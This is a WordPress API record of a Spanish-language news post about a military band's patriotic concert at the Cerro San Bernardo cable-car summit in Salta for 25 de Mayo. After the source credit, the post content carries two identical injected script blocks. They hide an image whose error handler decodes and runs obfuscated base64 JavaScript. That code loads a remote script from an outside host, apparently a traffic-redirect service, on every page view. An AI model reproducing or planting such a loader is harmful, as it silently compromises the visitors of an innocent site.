{"id":4053,"date":"2024-05-24T11:11:42","date_gmt":"2024-05-24T14:11:42","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4053"},"modified":"2025-08-13T23:55:27","modified_gmt":"2025-08-14T02:55:27","slug":"teleferico-san-bernardo-se-suma-a-las-celebraciones-por-la-revolucion-de-mayo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4053","title":{"rendered":"Telef\u00e9rico San Bernardo se suma a las celebraciones por la Revoluci\u00f3n de Mayo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-a04c98a662303eb9d1a3ee3af333d36e\" style=\"background-color:#096aa2\"><em>La banda militar Cnel. Bonifacio Ruiz de los Llanos \u201cLos Infernales\u201d brindar\u00e1 una retreta patri\u00f3tica en la cima del Cerro San Bernardo.<\/em><\/h4>\n\n\n\n<p>La cima del cerro San Bernardo se viste de celeste y blanco una vez m\u00e1s para celebrar el D\u00eda de la Patria, fecha de&nbsp;profundo significado hist\u00f3rico y cultural en el que conmemoramos la Revoluci\u00f3n de Mayo de 1810, un acontecimiento decisivo que marc\u00f3 el inicio del proceso de independencia del dominio colonial espa\u00f1ol.<\/p>\n\n\n\n<p>Esta iniciativa del Telef\u00e9rico San Bernardo se realizar\u00e1 ma\u00f1ana&nbsp;s\u00e1bado 25 de mayo, a las 15 hs, y contar\u00e1 con la destacada actuaci\u00f3n de la banda militar Cnel. Bonifacio Ruiz de los Llanos \u201cLos Infernales\u201d que ofrecer\u00e1 una retreta patri\u00f3tica para disfrute de los presentes.<\/p>\n\n\n\n<p>Esta jornada se suma a la agenda de actividades culturales y de entretenimiento abiertas al p\u00fablico que la Sociedad del Estado brinda a salte\u00f1os y turistas para conmemorar fechas especiales de una manera diferente, ante la maravillosa vista panor\u00e1mica de la Ciudad de Salta.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/teleferico-san-bernardo-se-suma-a-las-celebraciones-por-la-revolucion-de-mayo-95808\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La banda militar Cnel. Bonifacio Ruiz de los Llanos \u201cLos Infernales\u201d brindar\u00e1 una retreta patri\u00f3tica en la cima del Cerro San Bernardo. La cima del cerro San Bernardo se viste de celeste y blanco una vez m\u00e1s para celebrar el D\u00eda de la Patria, fecha de&nbsp;profundo significado hist\u00f3rico y cultural en el que conmemoramos la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4054,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4053","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4053"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4053"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4053\/revisions"}],"predecessor-version":[{"id":6779,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4053\/revisions\/6779"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4054"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4053"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4053"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4053"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}